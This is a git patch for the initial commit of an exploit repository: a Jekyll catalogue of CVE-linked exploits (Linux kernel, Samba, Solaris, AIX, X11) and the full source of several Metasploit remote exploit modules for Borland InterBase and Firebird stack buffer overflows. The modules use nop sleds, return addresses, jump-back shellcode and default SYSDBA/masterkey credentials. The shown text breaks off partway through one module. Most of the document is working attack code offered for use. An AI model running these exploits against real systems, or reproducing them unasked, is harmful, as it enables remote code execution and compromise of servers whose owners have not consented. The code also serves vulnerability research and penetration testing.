From 3bc5012e5a725c511f841d310b75e3e2b9324fb7 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Fri, 27 Dec 2024 01:20:10 -0800 Subject: [PATCH] Initial commit --- .github/workflows/build.yml | 60 ++++++ .gitignore | 6 + .ruby-version | 1 + Gemfile | 2 + _data/exploits.yml | 243 +++++++++++++++++++++ fb_isc_attach_database.rb | 172 +++++++++++++++ fb_isc_create_database.rb | 172 +++++++++++++++ fb_svc_attach.rb | 130 ++++++++++++ ib_inet_connect.rb | 120 +++++++++++ ib_isc_attach_database.rb | 173 +++++++++++++++ ib_isc_create_database.rb | 173 +++++++++++++++ ib_jrd8_create_database.rb | 111 ++++++++++ ib_open_marker_file.rb | 111 ++++++++++ ib_pwd_db_aliased.rb | 109 ++++++++++ ib_svc_attach.rb | 173 +++++++++++++++ linux-sendpage.c | 374 +++++++++++++++++++++++++++++++++ linux-sendpage2.tar.gz | Bin 0 -> 3420 bytes linux-sendpage3.tar.gz | Bin 0 -> 3871 bytes lsa_transnames_heap_linux.rb | 345 ++++++++++++++++++++++++++++++ lsa_transnames_heap_osx.rb | 336 +++++++++++++++++++++++++++++ lsa_transnames_heap_solaris.rb | 212 +++++++++++++++++++ rpc_ttdbserverd_realpath.rb | 278 ++++++++++++++++++++++++ sadmind_adm_build_path.rb | 166 +++++++++++++++ sco-x86-xkb.c | 85 ++++++++ sol-sparc-xkb.c | 196 +++++++++++++++++ sol-x86-xkb.c | 88 ++++++++ templates/README.md.liquid | 11 + templates/exploits.csv.liquid | 8 + templates/exploits.html.liquid | 26 +++ templates/exploits.json.liquid | 14 ++ templates/exploits.yml.liquid | 11 + 31 files changed, 3906 insertions(+) create mode 100644 .github/workflows/build.yml create mode 100644 .gitignore create mode 100644 .ruby-version create mode 100644 Gemfile create mode 100644 _data/exploits.yml create mode 100644 fb_isc_attach_database.rb create mode 100644 fb_isc_create_database.rb create mode 100644 fb_svc_attach.rb create mode 100644 ib_inet_connect.rb create mode 100644 ib_isc_attach_database.rb create mode 100644 ib_isc_create_database.rb create mode 100644 ib_jrd8_create_database.rb create mode 100644 ib_open_marker_file.rb create mode 100644 ib_pwd_db_aliased.rb create mode 100644 ib_svc_attach.rb create mode 100644 linux-sendpage.c create mode 100644 linux-sendpage2.tar.gz create mode 100644 linux-sendpage3.tar.gz create mode 100644 lsa_transnames_heap_linux.rb create mode 100644 lsa_transnames_heap_osx.rb create mode 100644 lsa_transnames_heap_solaris.rb create mode 100644 rpc_ttdbserverd_realpath.rb create mode 100644 sadmind_adm_build_path.rb create mode 100644 sco-x86-xkb.c create mode 100644 sol-sparc-xkb.c create mode 100644 sol-x86-xkb.c create mode 100644 templates/README.md.liquid create mode 100644 templates/exploits.csv.liquid create mode 100644 templates/exploits.html.liquid create mode 100644 templates/exploits.json.liquid create mode 100644 templates/exploits.yml.liquid diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml new file mode 100644 index 0000000..bdeefa3 --- /dev/null +++ b/.github/workflows/build.yml @@ -0,0 +1,60 @@ +name: build + +on: + push: + branches: main + + workflow_dispatch: + +jobs: + build: + name: Build + runs-on: ubuntu-latest + + steps: + - name: Checkout + uses: actions/checkout@v3 + + - name: Setup Ruby + uses: ruby/setup-ruby@v1 + + - name: Setup Pages + uses: actions/configure-pages@v1 + + - name: Build + run: | + touch -a README.md + rm README.md + bundle install + bundle exec jekyll build + cp _site/README.md README.md + + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + + - name: Commit + run: | + git config --global user.email "rcvalle@users.noreply.github.com" + git config --global user.name "Ramon de C Valle" + git add -A + git commit -m "Auto commit changes" || true + git push origin main + + deploy: + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + + name: Deploy + needs: build + + permissions: + id-token: write + pages: write + + runs-on: ubuntu-latest + + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..2e52d75 --- /dev/null +++ b/.gitignore @@ -0,0 +1,6 @@ +.bundle +.jekyll-cache +.sass-cache +Gemfile.lock +_site +vendor diff --git a/.ruby-version b/.ruby-version new file mode 100644 index 0000000..eb39e53 --- /dev/null +++ b/.ruby-version @@ -0,0 +1 @@ +3.3 diff --git a/Gemfile b/Gemfile new file mode 100644 index 0000000..167ee20 --- /dev/null +++ b/Gemfile @@ -0,0 +1,2 @@ +source 'https://rubygems.org' +gem 'jekyll' diff --git a/_data/exploits.yml b/_data/exploits.yml new file mode 100644 index 0000000..976c6db --- /dev/null +++ b/_data/exploits.yml @@ -0,0 +1,243 @@ +--- +- description: The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, + does not initialize all function pointers for socket operations in proto_ops structures, + which allows local users to trigger a NULL pointer dereference and gain privileges + by using mmap to map page zero, placing arbitrary code on this page, and then + invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage + function) on a PF_PPPOX socket. + filename: linux-sendpage3.tar.gz + name: Linux sock_sendpage() NULL Pointer Dereference Exploit for Linux POWER/PowerPC + x86 (3) + published: 2009-09-10 00:00:00.000000000 Z + resources: + - name: View on LWN.net + url: https://lwn.net/Articles/349999/ + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/linux-sendpage3.tar.gz + vulnerabilities: + - CVE-2009-2692 +- description: The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, + does not initialize all function pointers for socket operations in proto_ops structures, + which allows local users to trigger a NULL pointer dereference and gain privileges + by using mmap to map page zero, placing arbitrary code on this page, and then + invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage + function) on a PF_PPPOX socket. + filename: linux-sendpage2.tar.gz + name: Linux sock_sendpage() NULL Pointer Dereference Exploit for Linux POWER/PowerPC + x86 (2) + published: 2009-09-07 00:00:00.000000000 Z + resources: + - name: View on LWN.net + url: https://lwn.net/Articles/349999/ + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/linux-sendpage2.tar.gz + vulnerabilities: + - CVE-2009-2692 +- description: The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, + does not initialize all function pointers for socket operations in proto_ops structures, + which allows local users to trigger a NULL pointer dereference and gain privileges + by using mmap to map page zero, placing arbitrary code on this page, and then + invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage + function) on a PF_PPPOX socket. + filename: linux-sendpage.c + name: Linux sock_sendpage() NULL Pointer Dereference Exploit for Linux POWER/PowerPC + x86 + published: 2009-08-31 00:00:00.000000000 Z + resources: + - name: View on LWN.net + url: https://lwn.net/Articles/349999/ + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/linux-sendpage.c + vulnerabilities: + - CVE-2009-2692 +- description: Stack-based buffer overflow in the _tt_internal_realpath function in + the ToolTalk library (libtt.a) in IBM AIX 5.2.0, 5.3.0, 5.3.7 through 5.3.10, + and 6.1.0 through 6.1.3, when the rpc.ttdbserver daemon is enabled in /etc/inetd.conf, + allows remote attackers to execute arbitrary code via a long XDR-encoded ASCII + string to remote procedure 15. + filename: rpc_ttdbserverd_realpath.rb + name: ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) + published: 2009-06-23 03:49:25.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/rpc_ttdbserverd_realpath.rb + vulnerabilities: + - CVE-2009-2727 +- description: Multiple heap-based buffer overflows in the NDR parsing in smbd in + Samba 3.0.0 through 3.0.25rc3 allow remote attackers to execute arbitrary code + via crafted MS-RPC requests involving (1) DFSEnum (netdfs_io_dfs_EnumInfo_d), + (2) RFNPCNEX (smb_io_notify_option_type_data), (3) LsarAddPrivilegesToAccount + (lsa_io_privilege_set), (4) NetSetFileSecurity (sec_io_acl), or (5) LsarLookupSids/LsarLookupSids2 + (lsa_io_trans_names). + filename: lsa_transnames_heap_linux.rb + name: Samba lsa_io_trans_names Heap Overflow (Linux) + published: 2008-10-19 21:03:39.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/lsa_transnames_heap_linux.rb + vulnerabilities: + - CVE-2007-2446 +- description: Stack-based buffer overflow in the adm_build_path function in sadmind + in Sun Solstice AdminSuite on Solaris 8 and 9 allows remote attackers to execute + arbitrary code via a crafted request. + filename: sadmind_adm_build_path.rb + name: Sun Solaris sadmind adm_build_path() Buffer Overflow + published: 2008-10-14 14:22:34.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/sadmind_adm_build_path.rb + vulnerabilities: + - CVE-2008-4556 +- description: Multiple stack-based buffer overflows in Borland InterBase LI 8.0.0.53 + through 8.1.0.253, and WI 5.1.1.680 through 8.1.0.257, allow remote attackers + to execute arbitrary code via (1) a long service attach request on TCP port 3050 + to the (a) SVC_attach or (b) INET_connect function, (2) a long create request + on TCP port 3050 to the (c) isc_create_database or (d) jrd8_create_database function, + (3) a long attach request on TCP port 3050 to the (e) isc_attach_database or (f) + PWD_db_aliased function, or unspecified vectors involving the (4) jrd8_attach_database + or (5) expand_filename2 function. + filename: ib_inet_connect.rb + name: Borland InterBase INET_connect() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_inet_connect.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted create request. + filename: ib_jrd8_create_database.rb + name: Borland InterBase jrd8_create_database() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_jrd8_create_database.rb + vulnerabilities: + - CVE-2007-5243 +- description: Stack-based buffer overflow in Borland InterBase LI 8.0.0.53 through + 8.1.0.253 on Linux, and possibly unspecified versions on Solaris, allows remote + attackers to execute arbitrary code via a long attach request on TCP port 3050 + to the open_marker_file function. + filename: ib_open_marker_file.rb + name: Borland InterBase open_marker_file() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_open_marker_file.rb + vulnerabilities: + - CVE-2007-5244 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted attach request. + filename: ib_pwd_db_aliased.rb + name: Borland InterBase PWD_db_aliased() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_pwd_db_aliased.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted create request. + filename: fb_isc_attach_database.rb + name: Firebird Relational Database isc_attach_database() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/fb_isc_attach_database.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted create request. + filename: fb_isc_create_database.rb + name: Firebird Relational Database isc_create_database() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/fb_isc_create_database.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted service attach request. + filename: fb_svc_attach.rb + name: Firebird Relational Database SVC_attach() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/fb_svc_attach.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted attach request. + filename: ib_isc_attach_database.rb + name: Borland InterBase isc_attach_database() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_isc_attach_database.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted create request. + filename: ib_isc_create_database.rb + name: Borland InterBase isc_create_database() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_isc_create_database.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module exploits a stack buffer overflow in Borland InterBase by + sending a specially crafted service attach request. + filename: ib_svc_attach.rb + name: Borland InterBase SVC_attach() Buffer Overflow + published: 2007-10-04 03:03:13.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/ib_svc_attach.rb + vulnerabilities: + - CVE-2007-5243 +- description: This module triggers a heap overflow in the LSA RPC service of the + Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon + and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, + this module will not work when the Samba "log level" parameter is higher than + "2". + filename: lsa_transnames_heap_solaris.rb + name: Samba lsa_io_trans_names Heap Overflow (Solaris) + published: 2007-07-08 04:11:53.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/lsa_transnames_heap_solaris.rb + vulnerabilities: + - CVE-2007-2446 +- description: This module triggers a heap overflow in the LSA RPC service of the + Samba daemon. This module uses the szone_free() to overwrite the size() or free() + pointer in initial_malloc_zones structure. + filename: lsa_transnames_heap_osx.rb + name: Samba lsa_io_trans_names Heap Overflow (OSX) + published: 2007-07-05 01:41:39.000000000 Z + updated: 2020-10-02 16:38:06.000000000 Z + url: https://github.com/risesecurity/exploits/raw/HEAD/lsa_transnames_heap_osx.rb + vulnerabilities: + - CVE-2007-2446 +- description: Buffer overflow in the Strcmp function in the XKEYBOARD extension in + X Window System X11R6.4 and earlier, as used in SCO UnixWare 7.1.3 and Sun Solaris + 8 through 10, allows local users to gain privileges via a long _XKB_CHARSET environment + variable value. + filename: sco-x86-xkb.c + name: X11R6 XKEYBOARD Extension Strcmp() Stack-based Buffer Overflow Exploit for + SCO UnixWare 7.1.3 x86 + published: 2006-09-07 00:00:00.000000000 Z + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/sco-x86-xkb.c + vulnerabilities: + - CVE-2006-4655 +- description: Buffer overflow in the Strcmp function in the XKEYBOARD extension in + X Window System X11R6.4 and earlier, as used in SCO UnixWare 7.1.3 and Sun Solaris + 8 through 10, allows local users to gain privileges via a long _XKB_CHARSET environment + variable value. + filename: sol-sparc-xkb.c + name: X11R6 XKEYBOARD Extension Strcmp() Stack-based Buffer Overflow Exploit for + Solaris 8 9 10 SPARC + published: 2006-09-07 00:00:00.000000000 Z + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/sol-sparc-xkb.c + vulnerabilities: + - CVE-2006-4655 +- description: Buffer overflow in the Strcmp function in the XKEYBOARD extension in + X Window System X11R6.4 and earlier, as used in SCO UnixWare 7.1.3 and Sun Solaris + 8 through 10, allows local users to gain privileges via a long _XKB_CHARSET environment + variable value. + filename: sol-x86-xkb.c + name: X11R6 XKEYBOARD Extension Strcmp() Stack-based Buffer Overflow Exploit for + Solaris 8 9 10 x86 + published: 2006-09-07 00:00:00.000000000 Z + updated: + url: https://github.com/risesecurity/exploits/raw/HEAD/sol-x86-xkb.c + vulnerabilities: + - CVE-2006-4655 diff --git a/fb_isc_attach_database.rb b/fb_isc_attach_database.rb new file mode 100644 index 0000000..9eccc22 --- /dev/null +++ b/fb_isc_attach_database.rb @@ -0,0 +1,172 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted create request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38607' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls' + [ + 'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', + { 'Length' => [ 756 ], 'Ret' => 0x00370b0b } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 1, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ]) + end + + # Create database parameter block + def dpb_create + isc_dpb_user_name = 28 + isc_dpb_password = 29 + + isc_dpb_version1 = 1 + + user = 'SYSDBA' + pass = 'masterkey' + + dpb = '' + + dpb << [isc_dpb_version1].pack('c') + + dpb << [isc_dpb_user_name].pack('c') + dpb << [user.length].pack('c') + dpb << user + + dpb << [isc_dpb_password].pack('c') + dpb << [pass.length].pack('c') + dpb << pass + + dpb + end + + # Calculate buffer padding + def buf_padding(length = '') + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + padding + end + + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Attach database + op_attach = 19 + + # Extra padding to trigger the exception + extra_padding = 1024 * 16 + + buf = '' + + # Operation/packet type + buf << [op_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length + extra_padding].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-516].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Random alpha data + buf << rand_text_alpha(extra_padding) + + # Padding + buf << "\x00" * buf_padding(length + extra_padding) + + # Database parameter block + + # Create database parameter block + dpb = dpb_create + + # Database parameter block length + buf << [dpb.length].pack('N') + + # Database parameter block + buf << dpb + + # Padding + buf << "\x00" * buf_padding(dpb.length) + + sock.put(buf) + + select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/fb_isc_create_database.rb b/fb_isc_create_database.rb new file mode 100644 index 0000000..32bd900 --- /dev/null +++ b/fb_isc_create_database.rb @@ -0,0 +1,172 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted create request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38606' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls' + [ + 'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)', + { 'Length' => [ 756 ], 'Ret' => 0x00370b0b } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 1, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ]) + end + + # Create database parameter block + def dpb_create + isc_dpb_user_name = 28 + isc_dpb_password = 29 + + isc_dpb_version1 = 1 + + user = 'SYSDBA' + pass = 'masterkey' + + dpb = '' + + dpb << [isc_dpb_version1].pack('c') + + dpb << [isc_dpb_user_name].pack('c') + dpb << [user.length].pack('c') + dpb << user + + dpb << [isc_dpb_password].pack('c') + dpb << [pass.length].pack('c') + dpb << pass + + dpb + end + + # Calculate buffer padding + def buf_padding(length = '') + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + padding + end + + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Create database + op_create = 20 + + # Extra padding to trigger the exception + extra_padding = 1024 * 16 + + buf = '' + + # Operation/packet type + buf << [op_create].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length + extra_padding].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-516].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Random alpha data + buf << rand_text_alpha(extra_padding) + + # Padding + buf << "\x00" * buf_padding(length + extra_padding) + + # Database parameter block + + # Create database parameter block + dpb = dpb_create + + # Database parameter block length + buf << [dpb.length].pack('N') + + # Database parameter block + buf << dpb + + # Padding + buf << "\x00" * buf_padding(dpb.length) + + sock.put(buf) + + select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/fb_svc_attach.rb b/fb_svc_attach.rb new file mode 100644 index 0000000..8ff904b --- /dev/null +++ b/fb_svc_attach.rb @@ -0,0 +1,130 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = AverageRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Firebird Relational Database SVC_attach() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted service attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38605' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 256, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # 0x0040230b pop ebp; pop ebx; ret + [ + 'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910', + { 'Length' => [ 308 ], 'Ret' => 0x0040230b } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 308 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 1, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ]) + end + + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Service attach + op_service_attach = 82 + + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_service_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-260].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + #select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/ib_inet_connect.rb b/ib_inet_connect.rb new file mode 100644 index 0000000..1435da0 --- /dev/null +++ b/ib_inet_connect.rb @@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase INET_connect() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted service attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38605' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + }, + 'Targets' => + [ + # 0x0804d2ee 5b5e5f5dc3 + [ + 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', + { 'Ret' => 0x0804d2ee } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit + + connect + + # Attach database + op_attach = 19 + + # Create database + op_create = 20 + + # Service attach + op_service_attach = 82 + + length = 161 + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_service_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # Random alpha data + buf << rand_text_alpha(length - 5) + + # Target + buf << [target.ret].pack('L') + + # Separator + buf << ':' + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # It will return into this nop block + buf << make_nops(1024 - payload.encoded.length) + + # Payload + buf << payload.encoded + + sock.put(buf) + + handler + + end +end diff --git a/ib_isc_attach_database.rb b/ib_isc_attach_database.rb new file mode 100644 index 0000000..f336be2 --- /dev/null +++ b/ib_isc_attach_database.rb @@ -0,0 +1,173 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase isc_attach_database() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38607' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # 0x00403d4b pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.1.0.257', + { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b } + ], + # 0x00403d4d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.0.0.123', + { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d } + ], + # 0x00403a5d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', + { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d } + ], + # 0x004038fd pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.0.1.1', + { 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd } + ], + # 0x0040390d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.5.0.28', + { 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d } + ], + # 0x00403901 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.1.6', + { 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 } + ], + # 0x004038b1 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', + { 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 } + ], + # 0x00404a10 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.5.0.742', + { 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 } + ], + # 0x00404a0e pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.1.1.680', + { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end 